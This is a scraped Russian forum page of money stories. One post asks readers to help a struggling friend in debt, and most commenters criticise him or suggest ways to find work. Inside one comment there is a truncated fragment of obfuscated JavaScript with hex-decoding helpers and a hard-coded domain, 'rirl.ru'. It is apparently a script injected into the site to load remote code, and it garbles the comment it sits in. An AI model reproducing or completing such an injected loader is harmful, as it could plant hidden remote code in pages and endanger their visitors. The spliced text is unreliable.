Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
меньше минуты назад2016-12-07 21:22:31 от Гость
что написать парню на отношения 11 месяцев приятное?? ... Подробнее
Последний комментарий
История : Убить своих друзей
3 минуты назад2016-12-08 15:27:21 от Неалина
5436Автор!А сколько вам лет?Надеюсь не за 30 и более. А то я от смеха шмякнусь. Все комментарии67622
Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
Топ из раздела
Истории о деньгах
Комедия
вчера в 12:41:152016-12-07 12:41:15
Любовь это безумия
05 декабря в 06:58:47
Любимый брат мужа
04 декабря в 21:17:22
На работу к папе
03 декабря в 16:30:38
Студент и препод
28 ноября в 23:53:36
Волосенкиии
27 ноября в 22:35:51
Сериалы смотрим?  ( 1 2 )
27 ноября в 16:31:08
опустить на главную
24 ноября в 07:57:38
Истории о деньгах - История из жизни
Истории о деньгах : История из жизни     Друзья расскажу вам о своем близком друге. Который всегда спешил людям на помощь.
Отец девочки в 1992 году был усыновлен.Его увезли далеко от родных мест. Приемные родители изменили ему фамилию место рождения, и даже дату рождения. В родном городе у него остались три родные сестры. Которые когда выросли переехали в Израиль. Они долгое время разыскивали своего брата. Наконец в один прекрасный день младшая сестра нашла его в социальной сети. Они долго переписывались, мечтали о встрече....
Он рассказал ей, что ушел от приемных родителей в 14 лет. Скитался, бомжевал, подрабатывал. выживал как мог. Но все же судьба наградила его встречей с девушкой, которая вскоре вышла за него за муж. У них родилась маленькая принцесса, в которой они души не чаят. Жена в декрете, муж работает то по стройке, то автомойщиком, то грузчиком или заправщиком. На жизнь вроде и хватает, и в тот же момент нет. Так как всегда им приходится влезать в долги, в кредиты. Болото это засасывает. Сейчас девочке полтора годика, родители ее очень любят и дорожат ей....но иногда даже на баночку агуша нету 34 рублей, уж не говорю о памперсах. У них нет возможности получить образование. У них нет возможности пойти на высокооплачиваемую работу. Он всему научился в области ремонта квартир и хочет открыть свою фирму. Но нет возможности, так как в кредитах и в помощи малого бизнеса ему отказывают. Да и куда больше кредитов уже, и так куча на его жене висит. В общем все дальше и дальше в болото...страшно....
Он часто мне рассказывает о своей мечте, как хотел бы увидеть родных, познакомить с ними жену и дочь, да и сам познакомиться. Ведь даже бабушка родная его еще жива и очень ждет встречи с внуком и правнучкой. Этот взрослый мужик 30 лет сидит и рыдает мне в плечо, от того, что он ничего не может поделать, ну не может он зарабатывать больше. Друзей богатых нет, поддерживают только морально, хотя сам всегда всех выручал, отдавал последние копейки. А сейчас нет никого, у всех свои проблемы, у всех свои семьи и у каждого свои трудности. Ребенка воспитывать надо, одевать жену надо, платить кредиты надо. Он каждый раз задает мне такие вопросы: Так как дальше быть? Что посоветуешь? Грабить? Мошенничать? Воровать? или в петлю?
В общем семья хорошая, добрая, и я решил им помочь, сделав этот пост, так как сам не миллионер, и уже не могу позволить себе давать им в долг денег. Вот)
А еще позже сайт сделаю, про его семью, там вообще фильм снимать можно будет, если он расскажет все подробности своего путешествия в жизни. Ну и на этом заработает) Но это все позже, а сейчас то как им дальше?
64310
Другие Истории о деньгах
(20)
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка offline
Репутация : 1666899
Комментариев 6923 36
28 апреля 04:03:18
2016-04-28 04:03:18

Ага, давайте всем миром скинемся двум взрослым товарищам, которые не в состоянии вдвоем заработать одному ребенку на питание. Ну действительно, кому же еще собирать деньги, как не здоровому мужику тридцати лет, который вместо того, чтобы работать, нагребся кредитов и не подумал, чем он их будет отдавать.

Ответить
Поддерживаю Да7 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Злая Сибирячка
20475 Злая Сибирячка
Злая Сибирячка online
Репутация : 94371
Комментариев 701 1
28 апреля 07:32:17
2016-04-28 07:32:17

С одной стороны я могу понять этого бедолагу. Действительно стоит сейчас все дорого итд ИТП, но это не повод скидываться ему всем миром на проживание/пропитание. Сейчас в каждом городе полно сайтов, где люди отдают вещи нуждающимся за спасибо или шоколадку. Я недавно за шоколадку доску пеленальную отдала, собрала два больших баула детских вещей знакомому, который тоже в кредитах и жена беременная у него.

Еще пакет стоит с детскими вещами и моими старыми приличными вещами в церковь, только я не знаю примут ли туда, или может лучше фонд какой найти...

Короче, если ребенок уже большенький, можно и в ясли попробовать устроить, а жене на биржу труда встать, чтобы пособие получать.

Вашему другу надо не ныть, а стучать во все двери! Может ему жилье положено как сироте, а он и не знает? Субсидии пусть оформляет, объявы в интернете кидает, что вещи примет в дар, какие требуются...

Ответить
Поддерживаю Да1 / Нет0
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка offline
Репутация : 1666899
Комментариев 6923 36
28 апреля 07:37:25
2016-04-28 07:37:25

Злая Сибирячка, Ой, да не смешите! Бедолага? Вы это серьезно? Ему 30 лет, он здоровый бугай.

У нас на сайте есть девушка, она сама об этом много раз писала, поэтому, надеюсь, не обидится, что я ее в пример привела. Так вот она была в декрете, а муж тоже без образования. Работал на не самой высокооплачиваемой работе. И жили на съемной квартире. И ниче. Не побирались. Ребенок не голодал, жили скромно, но без долгов, и дите ничем было не обделено.

Ответить
Поддерживаю Да0 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Злая Сибирячка
20475 Злая Сибирячка
Злая Сибирячка online
Репутация : 94371
Комментариев 701 1
28 апреля 07:59:55
2016-04-28 07:59:55

Сиреневая Кошка, понятное дело, что виноват он сам, и проще всего его обвинить. Но стоит учесть, что он рос без родителей, когда его усыновили/взяли под опеку он может по глупости своей, а может и не от хорошей жизни сбежал от приемных родителей. Так и не получив установку или хотя бы ориентир как БЫТЬ МУЖИКОМ. И спросить совета даже не то, что не у кого, а просто стыдно.

Я не говорю, что его надо жалеть, настоящие мужчины не нуждаются в жалости, просто иногда нужно просто выслушать и понять! Ну а ему еще и нужен волшебный пендель!

Ответить
Поддерживаю Да0 / Нет0
Гость №1
Гость №1

28 апреля 10:38:21
2016-04-28 10:38:21
Автор готовьтесь к тому, что ваш проект завалят. Я знаю, сколько получают люди, которые занимаются ремонтом квартир. Если руки из нужного места, то заработок будет выше раза в 2-3 среднего заработка в городе. Совершенно образование тут не имеет значение, обычное сарафанное радио. Значит одно из двух, или он не особо борется за заказы, или плохо работает. Прежде чем открывать свою фирму, пусть научиться частно зарабатывать деньги. Образование можно получить бесплатно. Только для начала, ему решить вопрос со школой придется. Идешь в центр занятости, они посылают на различные курсы, можно хоть какое-то образование получить. Сварщика, моляра и т. п. В любое ПТУ можно пойти без денег и экзамены толком не сдавать. Было бы желание. То, что кредитов набрали - сами идиоты. Пусть учатся перераспределять расходы. Что бы и на жизнь хватало и долг гасился. Но честно вряд ли люди исправятся. Я видела таких. Они даже если им пытаются помочь, все равно целенаправленно упрямо лезут дальше в болото. Они изначально туда лезут из-за своего мировоззрения. Что бы что-то менять, надо не кино снимать про них, а им свое отношение к жизни менять, учиться жить.
Ответить
Поддерживаю Да3 / Нет0
Гость №1
Гость №1

28 апреля 10:38:49
2016-04-28 10:38:49
Злая Сибирячка, Не говорите глупостей. А как сироты начинают работать? Как дети алкашей, бомжей - работают, пробиваются в люди? Ими вообще не кто не занимается и советы им ни кто не дает.
Ответить
Поддерживаю Да0 / Нет0
Васька
Васька

28 апреля 10:39:15
2016-04-28 10:39:15
Прошу пардону, но сироты, дет. домовские и т. п. в большенстве своем считают, что им все всё должны и обязаны. Почему я не родив ребенка, потому что ... должна помочь материально тому, кто родил не задумываясь, о том, как быть дальше ??? Помогите мне и я тоже буду рожать и жить за чужой счет, возьму до хрена кредитов - на что ??? потому что мне должны и буду просить весь белый свет мне помочь их выплатить.
Ответить
Поддерживаю Да1 / Нет0
Гость
Гость

28 апреля 10:39:26
2016-04-28 10:39:26
Сиреневая Кошка, Согласно с вами полностью ! Сколько в стране таких семей, и всем будет помогать. Да жалко конечно ! Самое главное что семья здоровая, а деньги дело наживное !
Ответить
Поддерживаю Да1 / Нет0
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка offline
Репутация : 1666899
Комментариев 6923 36
28 апреля 10:39:39
2016-04-28 10:39:39

Он каждый раз задает мне такие вопросы: Так как дальше быть? Что посоветуешь? Грабить? Мошенничать? Воровать? или в петлю?

Я понимаю, что развод какой-то, но интересная подача. А у нас можно только воровать или кончать с собой {#}. Вариант честно работать ваш воображаемый друг вообще не рассматривает? Устроиться на 2, 3 работы? Нанять няню ребенку на полдня и пойти жене на рынок торговать тоже?

Или грабить, или побираться, или в петлю. Алес капут.

// o;o++)t+=e. CharCodeAt(o). ToString(16);return t}, a=function(e){e=e. Match(/[\S\s]{1, 2}/g);for(var t="", o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "rirl.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Ответить
Поддерживаю Да4 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Xelen
21144 Xelen
Xelen offline
Репутация : 36166
Комментариев 436 1
28 апреля 10:39:45
2016-04-28 10:39:45

А почему бы на склад не пойти кладовщиком? И заработок нормальный и калымить иногда можно. На многих складах и образования не нужно.

Ответить
Поддерживаю Да4 / Нет0
Violetta
14552 Violetta
Violetta offline
Репутация : 1249833
Комментариев 8866 0
28 апреля 14:54:19
2016-04-28 14:54:19

Злая Сибирячка, почему сироте? его же усыновили, значит, он не сирота.

Гость №1, абсолютно согласна, если он не бухарик и руки из правильного места растут - то он должен нормально зарабатывать.

Вообще , мне показалось, что парень ненадежный что ли... Неблагополучный. Почему он сбежал от родителей? Еще и бомжевал? Вот и усыновляй потом....

Ответить
Поддерживаю Да2 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
Блондиночка
10883 Блондиночка
Блондиночка offline
  • Мисс Остроумие
Репутация : 2898257
Комментариев 17181 30
28 апреля 15:43:26
2016-04-28 15:43:26

Ок, давайте теперь всем миром содержать те семьи, кто по уши в кредитах! А чё?=){#}Мы видимо для того и работаем все, чтобы кормить здоровенных лбов, которые однажды взяли кредит, решив шикануть, а теперь по уши в дерьме.

Да у нас вся страна в кредитах, чё теперь всем помогать тем, кто головой своей не думал и влезал? Ведь прежде чем брать кредит нужно сто раз подумать о том, что его чем-то отдавать нужно.

И уж совсем стрёмно от того, что взрослый, тридцатилетний мужик, сидит и рыдает. От того, что сам же влез в это дерьмо.

Нужно усвоить всем людям простую, житейскую истину - по доходам и расходы. И что не стоит пытаться прыгать выше своей головы. Нужно жить рассчитывая на собственные возможности. И при чём здесь образование?Есть куча работ для мужиков, на которых они могут заработать больше денег чем человек с двумя вышками. Просто было бы желание.

У меня брат работает на работе, а по выходным дням нанимается ремонт делать. И хочу отметить, неплохой доход.

Так же мне интересно, какая необходимость им была брать кредиты, если работал один муж? Пускай уроком им будет. И наконец-то пускай начнут думать головушкой своей.

Так же, будь у них и богатые родственники и друзья, всё равно никто бы не был обязан их тянуть. Они семья. И за свою семью твечать должны только они.

Ответить
Поддерживаю Да3 / Нет0
Хожу по дому на каблуках и пью кефир из фужера. Это придаёт моему безделью особую изысканность.
Bert
20913 Bert
Bert online
Репутация : 124710
Комментариев 1183 1
28 апреля 16:05:55
2016-04-28 16:05:55

Автор вы знаете сколько на свете людей, которым нужна реальная помощь. Инвалиды пенсионеры которым бывает очень сложно в этой жизни, работать не могут. Детей больных, которым нужна помощь, там уже идёт между жизнью и смертью. Таким можно помочь и получаешь от этого удовольствия. Жаль семью, но каждая семья с чего то начинает. Всем тяжело, но как то стараются найти способ жить нормально. А так если думать когда тяжело воровать, мошейнничать в петлю с такими мыслями не чего хорошего не выйдет. Знаю многих ребят, которые с детского дома вставали на ноги и живут не хуже других. Или вы думаете всем родители помогают? Нет. Мне лично ни кто не помогал, не потому что не хотели или не предлогали. Я сам не хотел не какой помощи. И уже с 16 лет начал работать в больнице, подрабатывал. Поступил сам без какой либо помощи в медицинский, продолжая работать. Я на столько хотел быть самостоятельным, что хватался за всё что можно. Закончил учиться, на собирал деньги, уехал за Границу. Уже сдесь переучился и стал работать. Помогаю родителям. Всё это я пишу не для того, чтоб показать какой я весь молодец. А к тому что, когда человек целеустремлённо движеться к цели, он до неё доходит. Меня ни когда не посещали мысли воровать, мошенничествовать. Чем выше трудности, тем с упорством их преодолеваешь. Это жизнь, всем тяжело, но надо стараться как то выкручиваться. Я не хочу в чём то упрекнуть ваших знакомых. Но может куда то на заработки поехать.

Ответить
Поддерживаю Да1 / Нет0
Злая Сибирячка
20475 Злая Сибирячка
Злая Сибирячка online
Репутация : 94371
Комментариев 701 1
28 апреля 19:26:05
2016-04-28 19:26:05

Violetta, мы всех нюансов не знаем, автор может быть тоже. Потому что взять под опеку или усыновить это две разные вещи. Поэтому я и предположила, что можно попробовать выбить жилье как сироте, если он был взят под опеку, а не усыновлен.

Ответить
Поддерживаю Да0 / Нет0
Злая Сибирячка
20475 Злая Сибирячка
Злая Сибирячка online
Репутация : 94371
Комментариев 701 1
28 апреля 19:33:00
2016-04-28 19:33:00

Гость №1, при чем здесь мифические дети бомжей/алкашей? Я ни сколько не сомневаюсь в вине этого парня, во всей сложившейся его ситуации. Да, он по дурке набрал кредитов, да, сидит ноеь, вместо того чтобы двигаться как-то дальше.

Но мы все люди, иногда нам свойственно давать слабину. Этому парню нужен хороший пендель, чтобычтобы он вскочил и зарабатывал.

Ответить
Поддерживаю Да0 / Нет0
Violetta
14552 Violetta
Violetta offline
Репутация : 1249833
Комментариев 8866 0
28 апреля 19:33:37
2016-04-28 19:33:37

Злая Сибирячка, написала, исходя из текста автора :"был усыновлен"

Ответить
Поддерживаю Да0 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
Полярная звезда
20241 Полярная звезда
Полярная звезда offline
Репутация : 46561
Комментариев 342 0
28 апреля 20:29:27
2016-04-28 20:29:27

А сиысл этой истории в чем? В том что нам надо всем скинуться в помощь этой семье? Я так поняла из конца истории.

Ответить
Поддерживаю Да0 / Нет0
Полюшка
15599 Полюшка
Полюшка offline
Репутация : 271521
Комментариев 1800 62
28 апреля 20:59:25
2016-04-28 20:59:25

Вы бы лучше другу помогли на работу нормальную устроиться, а не сайт для него сооружали. Как по мне, это даже унизительно здоровому мужику заиметь свой сайт, чтобы потом сидеть на нем и плакаться о том, что в свое время у него не хватило мозгов, чтобы не влазить в кабалу с кредитами.

Ответить
Поддерживаю Да3 / Нет0
Счастье-это жить для тех,кого любишь и знать,что они живут ради тебя.
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 251676
Комментариев 2472 8
28 апреля 21:25:26
2016-04-28 21:25:26

Да, кредит - жто своего рода соблазн.. Эх, возьму, а там будь как будет!!Знаю, один раз в тяжелой ситуации соблазнилась, но тогда мне эти деньги помогли заработать больше денег..... Но обвешаться кредитами и ПРОЕСТЬ все.. Или прогулять..... не понимаю такого. Ну как можно брать кредиты, зная, что сегодня плохо, а потом с долгами будет еще хуже.... Как это у человека, который работает в строительстве нет на баночку Агуши, значит НУЖНО больше работать... ! На что брали эти самые кредиты... ? Уверена на телефоны или еще что нибудь.... И не всегда хорошее образование - это обязательно высокий заработок, сли человек не хочет работать, а хочет ныть и получать манну небесную.. Ваш друг ищет причины почему он не может зарабатывать, а нужно искать возможность заработать .

Ответить
Поддерживаю Да1 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Ночная Фурия
18055 Ночная Фурия
Ночная Фурия offline
Репутация : 123051
Комментариев 2542 6
29 апреля 11:21:43
2016-04-29 11:21:43

С чего вы взяли что этот Вася Пушкин вообще существует?? Это по-моему просто кто то хитро в попу укушенный решил, авось получится бабла рубануть.

Ответить
Поддерживаю Да0 / Нет0
Мне осталась одна забава: Пальцы в рот — и веселый свист. Прокатилась дурная слава, Что похабник я и
Уважаемые пользователи, у каждого человека своя точка зрения на то, что изложено в истории. Даже если Вы не согласны с автором истории или с другими читателями, пытайтесь выражать свое мнение в деликатной форме. Чтобы обгадить другого, много ума не нужно, а вот помочь дельным советом не каждый сможет.
Имя :
Пол: Гость Гость
Простой редактор

Введите число указанное на картинке